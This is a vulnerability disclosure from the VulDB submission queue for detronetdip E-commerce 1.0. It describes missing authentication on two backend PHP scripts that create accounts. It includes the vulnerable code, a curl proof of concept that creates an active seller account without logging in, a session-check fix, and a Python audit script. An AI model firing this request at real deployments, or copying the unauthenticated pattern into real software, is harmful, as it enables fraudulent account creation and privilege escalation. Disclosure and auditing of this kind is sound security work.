Submit #751857: detronetdip E-commerce 1.0 Access Control Violation

Title: detronetdip E-commerce 1.0 Access Control Violation
Description:
Severity: CRITICAL (9.8)
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Bug Type: CWE-306: Missing Authentication for Critical Function

The backend scripts responsible for creating new User and Seller accounts completely lack authentication or authorization checks. These files are directly accessible via HTTP requests (Admin/assets/backend/...). The application architecture assumes that users will only access these files via the Admin Dashboard UI, which is protected by a login page. However, the backend processing scripts themselves do not verify that the request was initiated by an authenticated administrator. This allows an unauthenticated external attacker to create valid User and Seller accounts, bypassing any frontend approval workflows or registration closures.

Vulnerable Files:
- Admin/assets/backend/seller/add_seller.php
- Admin/assets/backend/user/add_user.php

Vulnerable Code Analysis:
File: Admin/assets/backend/seller/add_seller.php

    require('../../../../utility/utility.php');
    // FLAW: No session_start() is called to resume a session.
    // FLAW: No check is performed to verify if $_SESSION['ADMIN_ID'] is set.
    // The code proceeds directly to database insertion.
    $email=get_safe_value($con,$_POST['email']);
    $password=password_hash($pass, PASSWORD_DEFAULT);
    // The attacker-supplied data is inserted directly into the 'sellers' table.
    mysqli_query($con,"insert into sellers (password,mobile,email,status,is_new) values ('$password','$mobile','$email','1','1')");
    echo 1;

Exploit Proof of Concept (PoC)
Exploit Command: The attacker sends a direct POST request to the backend file to create a seller account with the status "Active" (1).

    curl -X POST \
      -d "[email protected]" \
      -d "pass=password123" \
      -d "mobile=0000000000" \
      "http://localhost:3000/Admin/assets/backend/seller/add_seller.php"

Output: 1

Impact
- Authorization Bypass: Attackers can create accounts even if public registration is disabled.
- Privilege Escalation: By creating a "Seller" account, the attacker gains access to the seller dashboard, which is a prerequisite for exploiting other vulnerabilities (such as the IDORs mentioned above).
- Spam/Fraud: Attackers can flood the database with fake accounts, degrading database performance and complicating user management.

Remediation Recommendations: Enforce Authentication on Backend Endpoints
To mitigate the Broken Access Control, every backend PHP file must verify the user's session state before processing any data. Add the following check at the very top of add_seller.php and add_user.php:

    session_start();
    if (!isset($_SESSION['IS_LOGIN_ADMIN']) || $_SESSION['IS_LOGIN_ADMIN'] !== "YES") {
        http_response_code(403);
        die("Unauthorized Access");
    }
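Since the remediation has to be applied to every backend script, a quick way to verify coverage is to audit the tree for scripts that write to the database without the session gate. The following audit script is an added example, not part of this submission or of the detronetdip E-commerce project; the file contents in SAMPLE_TREE are constructed samples modelled on the vulnerable and fixed snippets above, the paths are the two files named in the advisory, and the IS_LOGIN_ADMIN session key is the one used in the recommended fix.

```python
import re

# Patterns for the gate the remediation requires and for database writes.
SESSION_START = re.compile(r"\bsession_start\s*\(")
ADMIN_CHECK = re.compile(r"\$_SESSION\s*\[\s*['\"]IS_LOGIN_ADMIN['\"]\s*\]")
DB_WRITE = re.compile(r"mysqli_query\s*\(|->query\s*\(")

def audit_script(source: str) -> list[str]:
    """Findings for one PHP script; an empty list means it looks gated."""
    findings = []
    write = DB_WRITE.search(source)
    if write is None:          # scripts that never touch the DB are out of scope
        return findings
    check = ADMIN_CHECK.search(source)
    if SESSION_START.search(source) is None:
        findings.append("no session_start(): session is never resumed")
    if check is None:
        findings.append("no $_SESSION['IS_LOGIN_ADMIN'] check before DB write")
    elif check.start() > write.start():
        findings.append("admin check appears after the first DB write")
    return findings

def audit_tree(files: dict[str, str]) -> dict[str, list[str]]:
    """Audit a {path: source} mapping; return only the files with findings."""
    return {path: f for path, src in files.items() if (f := audit_script(src))}

# Constructed samples modelled on the vulnerable and remediated code above.
VULNERABLE = """<?php
require('../../../../utility/utility.php');
$email=get_safe_value($con,$_POST['email']);
mysqli_query($con,"insert into sellers (email,status) values ('$email','1')");
echo 1;
"""
FIXED = """<?php
session_start();
if (!isset($_SESSION['IS_LOGIN_ADMIN']) || $_SESSION['IS_LOGIN_ADMIN'] !== "YES") {
    http_response_code(403);
    die("Unauthorized Access");
}
mysqli_query($con,"insert into sellers (email,status) values ('$email','1')");
"""
SAMPLE_TREE = {  # paths taken from the advisory above
    "Admin/assets/backend/seller/add_seller.php": VULNERABLE,
    "Admin/assets/backend/user/add_user.php": FIXED,
}

if __name__ == "__main__":
    for path, findings in audit_tree(SAMPLE_TREE).items():
        print(path, "->", "; ".join(findings))
```

Against a real checkout, replace SAMPLE_TREE with the contents of every file under Admin/assets/backend/ and treat any reported path as a script still exposed to this bug.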
Source: https://github.com/Nixon-H/Unauthenticated-Admin-Account-Creation
User: Nixon-H (UID 95173)
Submission: 02/04/2026 07:37 (3 months ago)
Moderation: 02/07/2026 10:11 (3 days later)
Status: Accepted
VulDB entry: 344867 [detronetdip E-commerce 1.0.0 Account Creation Endpoint add_seller.php email missing authentication]
Points: 20
